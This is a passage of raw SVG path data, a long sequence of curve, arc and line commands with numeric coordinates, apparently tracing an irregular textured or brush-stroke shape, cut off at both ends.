.1-1.5-1.9-2.2-2.7a37.31,37.31,0,0,0-4.1-.5q3.45.6,3.3.9a52.82,52.82,0,0,1-5.3-.9c.3.3.5.6-1.8.3-.1-.2-.1-.3-.2-.5-5.2-.9-7.1-.4-5.7.2a12,12,0,0,1,3,.2c.3.2,1.8.5,2.3.7-.6.3-3.6-.5-5.1-.5,3,.7-2.3-.3-2-.1,1.6.4,3.4.7,3.4,1-1.6-.2-3.9-.7-4.1-.6,8.6,2.5-5.1.9,2.6,3.4a12.75,12.75,0,0,0-3.9-.1c3.9.6,5.7.7,9.3,1.2-.5-.6-1.4-1.8,3.3-1.2.3.3,2.6,1.1-.6.8,1.6.3,3.9.6,4.3.8-1.8.9,3.4,3.4-.1,3.9.2-.2,4.6.7,5.1.6-4.3-1.1-3.3-1.5.4-1.3-3.7-1.3-2.3-2.3-3.4-3.2,5.8.9,6.7.1,11.1,1,.5-.2-1.8-1.2.5-.9.4.4,3.5.9,4.5,1.3.8-.1,2.2-.1,1.6-.6,2.6.5,3.4.8,4.1.6-.7-1-2.6-2.4,3.8-2.3,6.1,1.2,2.8,1.4,4.9,2.1,1.9-.1,0,.5,2.3.8.1-.3,6.4.8,7.3,1.2-.8.1-2.4,0-6.1-.7.3.3.5.7,3.4,1.1-2.2-1,5.5.8,5.1.5a19,19,0,0,1-3.3-.9c6.1,1,.3-.5-1.5-1,3,.2-4.4-2.3,2.1-1.8,1.4.6,2.5,1,1.5,1.1,4.3.8,6.6,1.5,7.8,2.2-2-.1-2.1-.4-4.3-.8.6.4,6.7,1.9,1.5,1.3a9.61,9.61,0,0,0-3.4-1c3.3,1.2,9.9,2.8,10.3,3.5,1.8.3,3.2.5,4.1.6,2.1,1.4,8.2,3.5,2.3,2.9.9.5-.8.9,1.7,1.5.7-.3,5.8.6,4.9.1a66,66,0,0,0,6.7,2c-2.3-.3-1.5.2-1.8.5-.1.1-.3.1-.9.1a2.7,2.7,0,0,0-.8-.1c-1.2-.3.9-.4-1.5-.7-1.7,0-2.6.2-3,.6-1.1.9,1.1,2.6-3.2,2.7-3.2-.8,2.5-.5-2.7-1.6-2.3,0-.8.9-3.4,1-3.9-.6-4.7-1-4.5-1.3,6.2,1,2.3-1.1,10,.7-2.6-1-3.5-1.7.3-1.5-.1,0-.2-.1-.4-.1-1.1-.3-3.7-.7-3-.9a15.44,15.44,0,0,1,3.3.8c-4.8-1.4-1.7-2.9-7-4.6a37.91,37.91,0,0,0,4.1.5c-2.5-.5-3-.9-5.5-1.4,1.3.6-2,0-2.9.1,1.5.3,3.9,1.2,1.4.9s-1.3-.5-3.3-.9c-.2.1.1.2-.9.1a2.67,2.67,0,0,0-1.2-.4c-.1.5,6.8,2.3,1.8,1.7.9-.3-3.6-.8-4.4-1.2,2.2-.1-1.8-1.6-2.9-2,1.4.9-5.6-.4-6.9-.1-1.7-.7,2.8.2,1.8-.3a49.24,49.24,0,0,0-10.2-1.1c.6-.2-2.3-.6-3.3-.9-1.5,0,.3,1-5-.3-.2.3,1.6,1.1-1.7.6-2.3-.6-.1-.9-4.6-1.7,13.3,4.2-14.6.3-5,3.7-5-1-4.5-.5-6.1-.6-3.9-.8-6.9-1.6-9.8-2.4,1.9.1,0-.3-.3-.6,1.7,0,4.1.7,4,.3-1.8-.3-3.2-.5-4.1-.6-.8-.6.6-.6,1.4-1.2-3.6-.8-3.7-1.1-7.5-1.6,1.8,1.1-2.2.7,3,2.3-2.3-.7-10.8-1.5-5-.3.1-.2-.6-.5.8-.3,1.6.3,3.8.6,4.2.8-.8.3,3.6,1.4-1.7.5,1.3.1,1.2-.2-1.3-.7.1.4-1.9-.3-3-.2,2.9.8,3.6,1.8.7,1.6-1.1-.2-2.1-.3-3.1-.5,2-.2-7.3-2-2.4-.9-2.4.4,6.9,2.3,10.1,3,.6.4-3.9-.5-4-.3,4.8.8,5.1,1.5,7.8,2.2-.5-.3,3.7.2,4.1.6-1.8.4,1,2.2-2.9,2.1-1.9-.4-3.4-.9-4.2-.7,7.2,1.2-1.6.7,1.7,1.5,3.6.7,1.1-.3,5.1.5-.5.3,1.6.7,3.4,1.1a13.75,13.75,0,0,1,2.2.6c-3.6-.1-2.1,1.5.1,2.4,3.5.4-1.5-.9,2.8-.3,2.2.5,6.6,1.2,8.6,1.8-1.2,0,.8.9,2.6,1.4a6,6,0,0,1,4.1.6c1.6-.7-2.4-1.9-1.2-2.7a39.56,39.56,0,0,1-4.3-.9c1.8.2-.3-.6,1.8-.3,3.7.6,1.6.9,5.6,1.6.7-.2-4-2,1.5-1l-.3-.6c-7.3-1.2-4.1-2.1,1.6-.7.8-.4-1.4-1.6,4.6-.6-2,.3-1.3,1,2,2.1.3-.2,2.9.3,1.8-.3-2.8-.4-2.1-.6-3.3-.9,2.4.4.8-.4,2.9-.1,3.4.7,3.2.3,5.1.6,3.3,1.1-.7,1-1.3,1.3,4.1.7.6-.5,3.9,0,1.7.3.7.4,2.3.7,2.3.3-.9-.9,1.6-.6,1.5.5,1.1.9,4.6,1.5a32.09,32.09,0,0,1-4.7.2c3.7.4,4.6,1.3,10.8,2.5-4.2-1.2-9.4-2.9-1.9-2.1-1.6-.8-2.3-1.8,1.2-1.6a38,38,0,0,0,5.6,1.6c4.4.5-3.5-1.4-.6-1.3.2.2.4.3,2.2.6.1-.3-2.2-.7-3.4-1.1a31.24,31.24,0,0,1,7.2,1c-3.5.8.5,2.7-5.3,3.1-2.3-1.3,5.4-.9-2.2-2.6,3,1-2.9.2,1.6,1.3-1.6.2-6.2-.5-3.7.4-1.1-.6,2.7.3,3.1.5-1,.2-1.1.1-1.7.5,5.6,1,3,1.6,9,2.6-6.5-2.2.5-2.1,4.7-2.3-1.7-.6-4.2-.5-5.3-1a12,12,0,0,1,3,.2c5.3,1.2,3.9.6,9.3,1.2,2,1-4.8-.4-4.9,0,.7.4,5.4,1.6,3.6,1.5a21,21,0,0,1-2.2-.6c-.5.1-1.4,0-1.9.1a24.16,24.16,0,0,1,4.3.9c-5.2-.8-8.7-1.1-9-.6,1.8.3,2.6.3,3.2.5-2.2,0-1.9.7-4.6.6,3.5.8.1.5,2.6,1.3-4.8-.8.8,1.1-3.7.4.8.2,1.3.3,1.2.4,10.3,1.9,2.8-1,8.5-.4-.4.6,2.4.8,3.2.6,5.6,1.8-7.7.5-1.2,1.7-.2.2-5.5.1-2.7.4,1.5-.3.8,0,5.2.8,2.2.3-2.6-1.1.6-.8,1.5.3,1.1,1,2.3.8-.9-.6-.1-.5-2.5-1.2,1.1,0,3.9.5,5.1.5-.9-.3-5.1-.8-4.4-1.1,11.2,1.7,4.3-.9,9.4-.7,3.9,2.2,1,3.2,2.1,4.5a6.26,6.26,0,0,1,2.1.4c.1.1.1.2.2.4-2.4-.4-4-.7-5.2-.8,2.6.9-2.2.1-2.7.4,2.9,1.3,1.2,3.2-1.3,3.5-.3.5,2.1,2.8-4.8,2.2,1.6.3,3.9.6,4.3.8a23.15,23.15,0,0,0-4.1,1.5c1.4.3,4,.6,4.2.8-.9.1-3.8-.4-5-.4,6.8,1.7-3.7.7,1,2.2,5.1.7,1.4-.3-.2-.5a2.7,2.7,0,0,1,1.8-.3c.1.5,1.6.3,3.1.5,1.3.4,1.3.5.2.5,8.3,1.4.4-1.1.2-1.6s7.8,1,6.9.3a15,15,0,0,0-3-.3c-1.6-.8-3.9-1.8.3-1.4.9.5,4.4.8,4.1.5-2.6-.6-1.2-.6-3.6-1.4,5.1,1.1.6-.6,6.2.8-.3-.6-3.1-.7-4.5-1.3,4.2.4-.8-.1-1.3-.7a20.19,20.19,0,0,1,4.1.6c.5-.5-2.8-1.5-.7-1.6-1.5-.4-3.3-.7-4.4-1.1,1.1-.3,2.3-.5,1.3-1.3,8,1.4,6.8-.5,12.6,0-1.07-.15-2.14-.35-3.2-.6.2-.3,6.1.8,2.9-.1-3.6-.7-1.1.3-5.1-.5-1.3-.8-4.5-2.4-2.2-2.6-1.1.2,4,1.3,4.4,1.2-1.7-.6-4.4-1.2-4.6-1.7,1.4.3,3.9.8,5.4,1.1,1.1-.4-1.9-1.6-.8-1.8a9.18,9.18,0,0,1,2.2.6c1.3,1-3.2,1.5,2.3,2.8-1.9-1.1,3.1-1.3-.4-2.8,5.8,1-2.5-1.9,4.4-1.1-5.2-2-2-3.5,2.2-3.6a12.82,12.82,0,0,0,2.1.5,4.69,4.69,0,0,0-2.4-1.1c-.1.1-.2.2-2-.1-.4-.8,1-.8.3-1.4,1.6.3,2.7.6,4.3.9-1.7-1,3.2-.1,1.4-1.1-2.9-.4-2.8-.1-5.2-.9,3,.5,2.5.1,4,.2-1.7-.5-4.3-.5-5.3-1.1.4-.6-.8-.8-1.8-1.7,4.1.7,3.6-.1,7.2.9.3-.6,2.8-.4-1.7-1.5,3.3.7,4,.4,7.4,1.3.1-.2-1.3-.5-1.3-.7-2.3-.3-5.6-.7-6.4-1.2,1.3-.8,3.8-1.5,1.7-2.7a15.78,15.78,0,0,0-2.4-1c1.8.3,3.3.6,4.3.8l-.3-.6q-4.05-.6-3.3-.9c4.5,1,1.9.1,6.2.8,2.1.7.6.8-.9.9a4.82,4.82,0,0,0-1.5.3c5.8,1.2,4.4,2.3,1.6,2.1,5.9.5,5.3-1.2,3.4-1.9a22.29,22.29,0,0,1,2.7-.2c1.7-.1,3.3-.3,3.6-.8a9.76,9.76,0,0,1-3.3-.9c-3.2-.6-3-.3-6.2-.9-1.3.2,3,.7,2.4,1-5.1-1-2.4.1-7.2-.9.6-.4,4.9-.4-.7-1.6l-.3-.6c1.4.3,3.9.8,5.4,1.1.2-.6-5.5-.8-5.5-1.5,1.7.1,4.3.5.8-.3,3.4.2,5.8,1.2,7.4,1.2-1.7-.3-2.1-1.1-.4-.8a24.16,24.16,0,0,1,4.3.9c-5.4-1.1.8.8.5,1.1-1.5-.1-4.2-.6-5.1-.5,5.1.9.8.7.4.8,6.7,1,5.1.1,5.8,0,3.3.5.9.5,4.5,1.3-1.1-.6-4.2-1.6.5-1-2.7-.5.7-.7-4.5-1.3-1.3.1,3.1,1.1.3.7-4.9-1.3.3-.7,1.5-.9-3.5-.7-.6.3-4.1-.5,0-.1-.9-.3-1.2-.4-.6-.7,1.7-.4,4.7-.3-.8-.4-1.6-.1-3.1-.4,0-.2-.6-.3-1.2-.5a17.85,17.85,0,0,1,4,.3c2.7.4,1,.6,4.4,1.1-1-.6-1.4-.8.6-.8-1-.4-4.6-1-4.5-1.3s2.7.2,2.9,0c-1.6-.4-3.1-1.4-.7-1.4-2.1-.5-2.9-.9-4.5-1.3-.8.4,1.7,1.1-1.6.7a13,13,0,0,0-2.3-.7c0,.3,1.8.6,2.4,1-6.5-1.2-.5.6-2.8.3-1.4-.3-2.1-.5-4.2-.8,3,1.1,4.8,2.4-1.1,1.8,6.1.9,1.9,1.5-2.8.2.3.6,3.1.7,4.5,1.3-2-.3-2.5-.2-5.1-.6-5.9-2-1.8-1.9,2.9-2.1-3.3-1.3-1.1-1.2-2.8-1.9,1.1.2,2.1.3,3.1.5-2.9-.6-1.5-1.5-4.7-1.7,2.7.7,1.1,1.1-1.6.7-1.1-.9,1.2-.9.2-1.8a19.5,19.5,0,0,0,5.1.6c-6.1-1-4.5-1.5-1.3-.8-1.3-1.2,3.1-1.5-.6-3.3,4.1.5,4.1-.2,1.5-1,1.4.2,2.3.4,3.2.6-1.4-.7.9-.4,2.8-.2-3-.9-3.6-.2-5.2-.8a7.88,7.88,0,0,1,3.8-.1c0-.8-3.4-3,.5-3-3.6-1.3-4.9-5.3,1.6-2.7.7-.7-1.2-1.9-1.1-2.4.6.7.6-.1,4.2.7-1.1-.5-1.5-.6.8-.4-4.9-.9,1.4-.5-2.6-1.4,0,.1-.8,0-1.1-.2,2.8.4,2.6.3,6.2.8,2.8.7.8.5,2.5,1.2,3.6.4,3.5.7,6.4,1.3-2.3-1.8-.8-1.4.9-2.3-3.9-.7-1,.4-3.9-.1l-.3-.6c-2-.3-3.5-.5-4.1-.5,3.9.6-.5.3,3.4,1-.8,0-.6.3-4-.3-.3-.3.8-.4-2.3-.8.9.4,1.8.8-.7.5-3.9-1.3.7-1.9-3.6-3.5a4.17,4.17,0,0,0,2.6-.4c2.1.1,4.2.1,6.1.3a9,9,0,0,1,2-.2,3.87,3.87,0,0,0,1.9.3,4.17,4.17,0,0,1-1.1-.3h2.3c-.5.3,1.4.4,1.5.7,6.9.4,16.6.6,21.8,1.2.4-.4-5.3-.5-2.6-.7,2.8.1,2.5.4,5.5.4.6.2.7.5,3.5.5-1.6-.3,2.5-.4-.3-.4h1.3c.2.1.5.1.7.2-.2-.1-.3-.1-.4-.2,1.8-.1,3-.2,5.5-.2.4.4,2.2.6,4.1.7a19.51,19.51,0,0,0,5.5-.3c4.4.2,5.8.5,10.1,1-4.4.3-6.2-.1-10.6-.2-2,.8,13.9.9,10.8.4,2.7.2,2.1.4,1.5.7,3.4,0,1.7.4,4.5.4-.5-.3,0-.4,1.8-.4,1.2.2,1.3.4,2.5.6,7.5,0,9.1.2,18.1.4a16.36,16.36,0,0,1,3.8-.6,42.76,42.76,0,0,0,6.5.2c0,.2.5.3,1.3.5,4.5.2,4-.1,7.3-.1.1.3,1.1.7-.5.9,2,0,2.4.2,4.3.2,1.2-.3-3.5-.7-.5-.8s4,.5,2.5.6c6.2.3,12.7,1.9,18.4.9.4.2,1.7.2,1.4.5,4.7-.1,5.6.1,8.3-.2.4.2,1.9.2,2.3.4,1.1.3-1.3.3-.7.5,7.8.7,22.3.4,14.2-.8a38.38,38.38,0,0,1,6.6.5c-.9.4-2.6.7-2.4,1.2-5.2.3-11.2.6-17.1.6h0a109.94,109.94,0,0,1-14.5-.9c-3.6-.5-.9-.8-7.1-1.1.7.5,2,.7-.4,1,8.7,0,2.4,1.4,6.5,1.9-1.1.1-4.3,0-4,.4.8.2,2.5.4,3.6.6-3,.4.2,1.1-.8,2.1a14.87,14.87,0,0,1-2.2-.2c2.9,1.2-2.9,2.2,4.3,3.4-.4.4-3.2.6-2.4,1.2-3.3-.1-5,0-7.3.1,13.3,1.8,42.6,1.7,42.7-.4,8-.9,11.9-2.1,10.1-3.7,3.1-.1,3.7.2,6.3,0-1.4-.8,1.1-1.2,5.4-1.4-3.2-.1.9-.2-.3-.4-1.6.1-3.9.3-8.2.4,0-1.2-7-1.7-3.8-2.6,9.3.5,12.6,1.4,24.2,1.7,3.1,0,2.5-.5,7.1-.4,0-.2-.5-.3-1.3-.5a38.13,38.13,0,0,0,4-.2c2.9-.3,2.3-.9.3-1.6a.42.42,0,0,1-.2-.1h.34c3.4,0,4.8.1,4.8-.2,3.4-.1,1,.4,4.4.3a8.21,8.21,0,0,1,2.1-.1c-.1-.2-.5-.3-1.4-.5,8.5-.2,8.5-2.7,21.2-1.2,0,.3,1.3.8-.4,1,6.4.3.9.9,5.1,1.4-.3-.8,2.5-1-2.1-1.6,6.7.3,7.9-.3,10.7.3.7-.5,1.7-.7,3.6-.9,1.1.3,2.6-.1,5.3.1-.8.5,2.4.7,4.8,1-4.2.1-5,.6-5.5,1.2a13.54,13.54,0,0,1,3.3.2c-2.2.2-3.7.5-2.5,1,5.3,0,7.9.4,11.7.2,2.8.9,10.5.4,15.4.9-2-.5,2-1-3.1-1.4,3.1-.2,6.4-.3,8-.6-8.6-.2-4-1.4,1.2-1.4-1.4-.4-3.3-.7-4.9-1.1,1.1,0,1.2-.1,2-.1,4.3.2,5.4.6,5.8.9-.3-.2.9-.2,3-.2-.7-.3-3-.8.6-.8,1.6.3.1.8,2.6.7-2.5-.6,3.7.2,6.2-.2,2.7.3.4.7.6,1,2.8.2,3.3,0,4.3.2-.5,1.1,2.1,1.9,1.7,2.5.7-.4,5.2.1,5.5.4-4.3,0,1.5.6-1.6.7-2.7-.3-1.9-.4-1.6-.8-3.3-.2-3.6,0-6.5-.2-1.4.4,4.6.1,4.5.4s.7.4-.8.4c-1.7,0-1-.3-3.3-.3.3.5-1.8.5-6.1.3-.2.3-.8.2-2.8.5,2,.1,2.3-.1,4.2,0,1.2.2,1.3.4,2.5.6-1.8-.3-6.3.2-2.8.5l3-.3c.5.6-4.6.6-1.4,1.1.2-.1,2.2-.1,3-.2-2,.2.1.7,2.6.8-.5-.3-2.6-.5.7-.5,2.6.6,12.9.1,7.1-.3,1,.9-9.5-.2-2,.2.7-.3-3.6-.2-3.5-.5,11.5,0,5.9.8,13.4,1.3-2.1-.3-3.3-.7-.6-.9,9.6.1,15.1-.6,15.7-1.3h.3c.8.3,4.2.3,6.6.5-.6-.5,2.1-.4,7.1-.4-2.2-.4-2.7-.5-.5-.8-1.5-.2-5.2-.2-5.5-.4.5-.3,1.5-.8,5-.4-1.6-.5.8-1-5-1.3a15.32,15.32,0,0,1-1.9.3c-.1-.1-.1-.2-.2-.3-7.8.5-16.3-1.3-8.3-1.5-.1.1.4.8,1.3.5q-1.2-.45,3-.3c-1.6.1.8.5,3.6.6-1.4-.5,1.3-.5,2.7-.6-5-.6-3.1-1.6-7.9-2.5a27.31,27.31,0,0,0,3-.2c.2.2.1.4,2.4.4.6-.6-3.6-.8-4-1.3,3.2,0,4.4-.3-.1-.2-1-.5-.2-.8,4.9-.6a24.64,24.64,0,0,0,3.7.8c.6-.3,3.2-.3,3.8-.6,1.8,0,.8.3,2.3.4,2.5-.3-.1-.4-2.3-.6a9.16,9.16,0,0,0-2.6-.4c-.1-.1-.2-.3-.3-.4,1.6,0,3.9.1,4.2,0-4.1-.1-5.7-.2-7.6-.4-.5-.3,3-.1,3-.3-1.3,0-1.3-.2-1.3-.4-2.5-.1-6.9-.6-6.3,0,2.5.2,3.8-.2,4.2.1.7.4-2.5.3-4,.4-2.9-.3.4-1-.9-1.3,0,.2-2.6.1-2.2-.2,3.2,0,3.3.3,6.4.2.6-.5-2.2-.7-2.8-1,1.4,0,1.4-.1,3.1,0,1.8.4-4.4-1.2-6.3-1.7h.4c2.4.3,1.8.5,3.3.8,2.1-.1,1.1-.4.1-.7,1.6.1,3.6.2,4.9.4,1.1.3-2.8.5.5.8-.4-.4,1.1-.6,3-.7.4.1.8.1,1.1.2,1.3.3,5.2.2,7.4.6-.8.2-7.4.7-4.8.7a8.21,8.21,0,0,1,2.1-.1c.1.1.1.1.1.2-.4,0-.7.1-.6.1h.5a3.36,3.36,0,0,1-.6.3c-.7-.1-1.5-.1-2.6-.2,1.7.7-4,.9.2,1.7h2.3a4,4,0,0,1,.5.1c0,.1.1.1.1.2-1.3.1-1.1-.1-3.7-.1-.7.3,1.8.3,3.9.3.9.7,2.7,1.3-1.4,1.6,4.5.4,2,1.2,7,1.6,0-.3.4-.6.4-.9.8-.1,1.5-.1,2.3-.2h-2.4c-.1-.2-.4-.3-1-.5a16.21,16.21,0,0,0,2.2-.2,8.1,8.1,0,0,0,2.2,0,2.08,2.08,0,0,1,.7.1c0-.2,2.5-.2,5.2-.1,1.2-.5.7-1.1,3-1.8-3.8-.1-1.8.5-6.1.3-.2-.1-.2-.1-.1-.1h.4a5.6,5.6,0,0,0,.7-.2,3.88,3.88,0,0,0,.9-.1h-.7a3.25,3.25,0,0,0-1.3-.3,23.14,23.14,0,0,1,3,.2c.3-.3,3-.8.3-1.1.1.3-1.7.3-2.8.5-7-1.2,7.3-1.1,12-1a11.71,11.71,0,0,1,3.8-.6c4.6.1,1.8.9,6.9.9,1.2-.2-4.4-.4-1.3-.5a12.28,12.28,0,0,0,2.9.2,4.76,4.76,0,0,0,.7.3h-.1c-.1.2.5.3,1.5.3.6.1,1.4.3,2.1.4-.4-.1-.5-.2-.4-.3,2.7.1,6.1.1,6.8.4-.6.1-1.9.5,1.4.6,2.9.1-1.4-.6,2.9-.4,1.8,0,.8.3,2.4.4.7-.3,2.8.2,5.3.1.2-.3-.8-.7,3.8-.7-5.8-.1-3.6-.4-7.5-.2a15.33,15.33,0,0,1,5.1-.2c-1.2-1.1,1.3-1.8-.8-2.7,3.2-.1,4.3-.4,8.1-.4,2.5,0,1.6.3,2.8.5-.4.1-.6.1-.9.2a3.7,3.7,0,0,1,1.1-.1h.5a12.27,12.27,0,0,1,2.1,0,2,2,0,0,1,.9-.2c1.5,0,3.3,0,5.4.2-3.6-.3-2.1-.4-1-.6-1.2.5,4.7.4,5.3,1a16.09,16.09,0,0,0-2.5.1,12.35,12.35,0,0,0-1.7-.3c1.2.5-5.7.7-1.9,1a24.26,24.26,0,0,0,3.3-.2,9.78,9.78,0,0,0,1.3.3c3.1-.3,0-.9,4.7-.9-.3.3-.1.8,3.8,1-.3-.6,3.4-.7,5.6-1,.9.2-5.2,1.5-.9,1.8,1.9-.7,6-.9,12-1,1.3-.3-3.3-.6-.4-.7-.4.5,5.4-.2,1.8-.4.3.3-5.3.1-5.4-.2a45.71,45.71,0,0,0,7.4,0c-.3-.8-1.3-1.4-4.4-1.9.7.3-1.5.4-.1.6.1,0,.1.1.2.1-4.1.2-7.2,0-9.8.4-1-.5-.1-.5-2.6-.8,2.3,0,3.6.4,3.1,0-5-.4-2.8-1,.2-1.3a31.61,31.61,0,0,1-5.2-1.7h1.3a3.54,3.54,0,0,1-1.2-.7,21.48,21.48,0,0,1,3.4-.2c-.1-.2-.7-.3-1.3-.4-1.2-.4-.4.1-2.2.1a.68.68,0,0,1,.5-.4c1.5-.1,2.7-.2,1.3-.3a.87.87,0,0,1-.5-.1,53,53,0,0,1,5.4-1.3c-6.7-.2-4.6.5-9.1.5-.2-.1-.5-.2-.7-.3,1.9-.1,1.8-.3,1.1-.7,4.8.1,5.9-.1,8.2-.1-9.7-.7-4.3-1.6-1.9-2.1a21.47,21.47,0,0,1,3,.3c1.3-.6.9-.9-2.2-1.2.2,0,.3-.1.5-.1,1,.1,2.4.1,3.8.1-1.3.1-2.6.5.9.6-.5-.3,4.1,0,2.9-.4-.3-.1-1.2-.1-2.1-.2a9.89,9.89,0,0,1,2.3.2c.1.6,3.1,1-.2,1.3-2.3-.1-1.1-.3-3.1-.4l.4.4c1.7.1,2.7.1,3.5.1-.4.2-2,.3-4.9.1.3.3,4.8.9,5.5.4-5.2-.3,1.6-.1,2-.2-1.8,0-1.1-.2-1.2-.3a20.13,20.13,0,0,1,2.2.1c-1.5-.4-1.8-.8-1.6-1.1a23.62,23.62,0,0,1,4.2.4c-.2.1-.3.3-.4.4a15,15,0,0,0-2.5.2h2.7c.1,0,.2.1.3.1-.2,0-.2-.1-.3-.1,2.5,0,2.8.2.5.2,5,.1.8.5,4.5.5,2-.5-3.3-.7-.7-1.1,4.8.7,2.1,1.4,10.7,1.9.3.4.2.6-.2.8h-.2a10.52,10.52,0,0,0-2.9,1.5c3.6.1,5.4,0,5.3-.3-3.3-.1-1.8-.4-1.1-.7.8.2.7.6,1.4.7,4.3.2,3-.3,7.3-.1-.6-.2-2.7-.6.4-.6.1.1.3.1.7.2,1.2.5-.8.9,1.6,1.4,1.4-.2,4.1.5,5.7.7a12.27,12.27,0,0,1,2.1,0c.3-.2,2.1-.3,2.8-.5,1.7.5,2.4-.1,5.2,0,1.8.1.1.5,3.5.5.9-.2,3.1-.8-.6-.9-.1.6-7.2-.1-9.7-.4,5.2-.2-.3-1.2,7.6-1.3-1.5-.1-3.3-.2-4.5-.4,1.5-.5,2.8-.8,8.2-.4-.4-.3,1.4-.3,2.9-.4,1.2.2,1.7.9-1.5.8.3.3,2.2.4.4.6,2,.2,4.4.4,6.7.6-1.8.5,2,.6.7,1,1.9,0,3.8.1,5.7.1.4.2-1.8.2-2.6.3,2.1.3,4.1-.1,5.8.2.6.5-.5.3-2.7,0-.7.4,7,.4,6.2.8-9-.3,1.2.6-5.1.5a11.33,11.33,0,0,1,2.6.3v.1c-.1,0-.2.1-.4.1h-1.7c1.8.5-2.8.2-1.8.5a26.2,26.2,0,0,0,2.8.1c1.9.1,2.1,0,2-.1.5,0,1-.1,1.3-.1a6.42,6.42,0,0,1-1.8-.2.3.3,0,0,0,.2-.1c.4,0,.9.1,1.5.1h.1c.7.1,2.3.1,2.7.2,3.5,0,7.9,0,9.5-.2-9.3-.2,1.1-.3-3.4-.7a13.45,13.45,0,0,0,4.2,0c-3.2,0-1.9-.4-4.5-.4-.4.2-.1.5-3.9.3-1.3-.5-1.1-.9,0-1.2a50.79,50.79,0,0,1,7.8.2c-.5-.3.1-.5,2.9-.4.1-.2-1.4-.3-1.4-.5h4.2c.9.4,5.3.5,10,.9a7.88,7.88,0,0,1,2-.1c-3.2-.5,3.2-.4-1.6-.8a73.05,73.05,0,0,1,8.5.2c-1.3.1-1.1.4,1.4.5-.6-.4-1-.8-5-1.2a8.17,8.17,0,0,0,1.3-.2c1.6.1,3.4.1,4.9.2-.2.3,3,.2,2.5.6-.6,0-1.1.1.1.1,0-.1.1-.1,1-.1.3.1.2.2,1.2.2-1-.4,1.6-.3.6-.6-2,0-3.4-.1-4.6-.2,2.2,0,3.8,0,3.4-.2h-4.2c1.5-.2,1.2-.4-.6-.7,4.3.2,2.4-.6,6.2-.2.8-.4-4.8-.2-4.5-.5a7.35,7.35,0,0,0,2.4-.5h.5a8.34,8.34,0,0,1,1.8-.2c1.6,0,3.5,0,3.5-.2a21.47,21.47,0,0,1-3-.3c.4.2.3.3-.4.3a13.35,13.35,0,0,1-2,0h0c.1-.2,0-.5-.4-.7.8,0,1.7.1,2.5.1,5.8.2,10.1.4,8,1-7.2.1-3.4.6-1.7,1.3-1.9,0-3.1-.1-4.3-.2-.3.2-3.5,1.1,2.5,1.3,3.1.1-2.1-.3-.5-.6,4.6.2,1.6-.3,5.4-.2,2.3,1-.5,1.1-7.4,1,.5.7-1,1.1-2.1,1.8-.5.3-.9.6-1,1.1h.9c2.7.1,4.2-.2,4.8.1-2.2.3,1.1.5.9,1a12.82,12.82,0,0,0-4.1,0c5.1.5-4.5.4,3.4.7a34.87,34.87,0,0,1-5,.3h-1.7c.5,0,1.1.1,1.7.1,1.9.1,4.1.2,5.5.3.7.3.2.4-.9.5,2,.2,5.3.2,7.3.4-1.5-.5,2.6-.4,5.2-.4.6-.3-1.6-.4-2-.5.1,0,.2-.1.3-.1,1.8,0,3.6.1,5.4.1,1,.4-3,.4,1.9.6,5.1-.3-10.1-1-4.2-1.6-.6.6,3.8.2,6,.5-1.3-.7,12.9-1.8,13.5-.5,4.8.2,5-.1,5.3-.3-3.6,0-5.1-.2-4.6-.4-2.5-.1-8.2-.1-8.6-.3.9-.3,2.1-.6-2.2-.9,6-1.7.7-3.9,1.8-5.9,1.4.5,1.4.5.8.9,8.2.2,3.8.7,4.9.8,1.1-.3,1.7.4,4.3.1,1.6.9-.8,1.5,6.1,2.2-.5-.9,9.1.5,8.3,0-8.8-.6-7.4-1.3-3-1.8-1.7-.1-4-.1-4.4-.2,4.9-.2,5.3.5,7.7.8a45.25,45.25,0,0,0,4.6-1.1c2.2.1,4.6.3,4.6.5-1.1.4-2.8.2-.7.7-1.9,0-3.1-.1-4.3-.2-.1.3,3.5.4,3.4.7-2.4-.1-4.7-.1-7.1-.2a60.26,60.26,0,0,1,11.1,1.6c2-.7,13.6-1.2,8.1-1.9,2.4,0,8.4-.1,9.8.1-3,.4-4.4.3-.5,1-1.8,0-2.1-.2-4.4-.2.7.9-9.7.2-8.8,1.1,2.5.2,6.1.4,7.6.7.7-.3,6.6.1,7.2.3-2.7.1-3.5.3,1.6.3-3.1.4-.1,1.3-5.7,1.4-3.3-.1-4.3-.3-8.6-.3-4.3-.7-2.4-1.6-3.5-2.4-2.6,0-4.7,0-5.5.1,3.1,0,4.6.2,4.5.4-3.2,0-3.7,0-7.1-.2.5.3.8.5-2.3.5l-.4-.4c-7.1-.2-9.4.6-7.5.9a31.43,31.43,0,0,1,4-.2c.5.2,2.5.2,3.1.4-.8.4-4.8,0-6.8.2,4,.3-3.2,0-2.6.2,2.1.1,4.6.3,4.6.5-2.1,0-5.3-.2-5.6,0,11.8,1.3-6.6,1.6,4.1,3a30.21,30.21,0,0,0-5.2.4c5.3.1,7.7-.1,12.5,0-.7-.5-2.3-1.5,4.1-1.7.5.2,3.7.8-.6.9,2.1.1,5.2.1,5.8.2-2.2,1.1,5.1,2.9.6,3.8.2-.2,6.2.1,6.9-.1-5.9-.5-4.6-1.1.2-1.3-5.2-.8-3.5-2-5.2-2.7,7.9.1,8.8-.8,14.8-.5.6-.3-2.6-.9.5-1,.6.3,4.8.4,6.2.7,1-.2,2.9-.4,2-.8,3.6.1,4.6.3,5.6,0-1.1-.9-3.9-2,4.6-2.7,8.2.3,4,1,6.8,1.5,2.4-.4.1.5,3.2.5,0-.3,8.6-.1,9.9.2-1,.2-3.1.3-8.2.1.4.3.8.6,4.7.7-3.1-.7,7.4.1,6.8-.2-2.1-.1-3.6-.3-4.5-.4,8.3.2.3-.6-2.1-.8,4-.2-6.2-1.7,2.4-2,2,.4,3.5.7,2.2.9,5.9.2,9,.6,10.7,1.1-2.7.2-2.8-.1-5.8-.2.9.3,9.2.9,2.3,1a17.36,17.36,0,0,0-4.6-.5c4.6.7,13.6,1.5,14.3,2.1a52.3,52.3,0,0,0,5.6,0c3.1,1.1,11.6,2.3,3.7,2.6,1.2.4-.9,1,2.5,1.3.9-.4,7.8-.2,6.5-.5,2.2.4,5.5.8,9.3,1.1-4.1,0-.6.8-3.4.9-3.8,0,.5-.5-3.2-.5-8.7.9.3,3.1-7.5,4.1-4.3-.3,3.2-.9-3.8-1.2-3,.3-.9.9-4.3,1.4-5.2,0-6.4-.3-6.2-.7,8.4.2,2.8-1.4,13.3-.7-3.7-.6-4.9-1.3.1-1.5-.8-.2-5.6-.2-4.7-.5a33.79,33.79,0,0,1,4.5.3c-6.7-.7-2.8-2.7-10.1-3.6,2.6,0,4.7,0,5.5-.1-3.4-.1-4.1-.5-7.5-.6,1.9.4-2.7.3-3.8.5,2.1.1,5.3.7,